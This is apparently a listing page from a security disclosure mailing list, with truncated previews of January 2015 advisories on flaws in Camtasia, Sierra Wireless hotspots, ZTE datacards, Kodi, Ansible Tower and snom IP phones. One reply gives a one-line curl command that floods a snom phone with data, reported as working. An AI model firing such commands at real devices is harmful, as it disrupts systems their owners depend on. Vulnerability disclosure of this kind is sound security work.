Posted by Martin Schuhmacher on Jan 14
Hi,
dd if=/dev/zero bs=1M count=32 | curl $IP --data-binary @-
[x] works
Firmware: snom360-SIP 8.7.4.8
this version was available for a very limited time + guessing
the correct filename for a snom360
Yours
Martin
Posted by Soroush Dalili on Jan 14
Title: Reflected XSS in Flash files of TechSmith Camtasia 8 & 7
Author: Soroush Dalili (@irsdl)
Affected Software: TechSmith Camtasia v8.4.4 (latest 8.x) & v7.1.1 (latest
7.x)
Vendor URL: http://www.techsmith.com/camtasia-version-history.html
Vendor Status: vulnerable
CVE-ID: –
Camtasia 8 (v8.4.4 (latest 8.x) – vulnerable):
==============================================
TechSmith Camtasia is a screen recorder and video editor. After…
Posted by Luke Walker on Jan 14
Sierra Wireless AirCard 760S/762S/763S Mobile Hotspot CRLF Injection
[*] Overview
Sierra Wireless produces a mobile wi-fi hotspot device that is popular
amongst telecommunication companies for re-branding to suit local markets.
The AirCard 760S/762S/763S Web-based Administrative Console suffers from a
HTTP header injection that allows an attacker to inject a file into the
HTTP response from the device.
[*] Description
The configuration…
Posted by kapejod () googlemail com on Jan 14
Nice, it seems you had more luck with reporting those issues.
I reported the path traversal and null-byte injection to Snom on the 12th
of March 2013.
Posted by Vulnerability Lab on Jan 13
Document Title:
===============
ZTE Datacard PCW (Telecom Mobilise MF180) – Multiple Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1405
Release Date:
=============
2015-01-12
Vulnerability Laboratory ID (VL-ID):
====================================
1405
Common Vulnerability Scoring System:
====================================
6
Product & Service Introduction:…
Posted by Vulnerability Lab on Jan 13
Document Title:
===============
Sitefinity Enterprise v7.2.53 – Persistent Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1369
Release Date:
=============
2015-01-06
Vulnerability Laboratory ID (VL-ID):
====================================
1369
Common Vulnerability Scoring System:
====================================
3.7
Product & Service Introduction:…
Posted by Vulnerability Lab on Jan 13
Document Title:
===============
Foxit MobilePDF v4.4.0 iOS – Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1400
Release Date:
=============
2015-01-12
Vulnerability Laboratory ID (VL-ID):
====================================
1400
Common Vulnerability Scoring System:
====================================
6.9
Product & Service Introduction:…
Posted by SEC Consult Vulnerability Lab on Jan 13
SEC Consult Vulnerability Lab Security Advisory < 20150113-2 >
=======================================================================
title: Cross-Site Request Forgery
product: Kodi/XBMC
vulnerable version: XBMC/Kodi <=14
fixed version: no fixed version available
impact: medium
homepage: http://kodi.tv/
found: 2014-10-29
by: W. Ettlinger…
Posted by SEC Consult Vulnerability Lab on Jan 13
SEC Consult Vulnerability Lab Security Advisory < 20150113-1 >
=======================================================================
title: Privilege Escalation & XSS & Missing Authentication
product: Ansible Tower
vulnerable version: <=2.0.2
fixed version: >=2.0.5
impact: high
homepage: http://www.ansible.com/tower
found: 2014-10-15
by:…
Posted by SEC Consult Vulnerability Lab on Jan 13
SEC Consult Vulnerability Lab Security Advisory < 20150113-0 >
=======================================================================
title: Multiple critical vulnerabilities
product: snom IP phones
vulnerable version: all firmware versions <8.7.5.15, all firmware branches
of all snom desktop IP phones (3xx, 7xx, 8xx, etc)
are affected
fixed version: 8.7.5.15…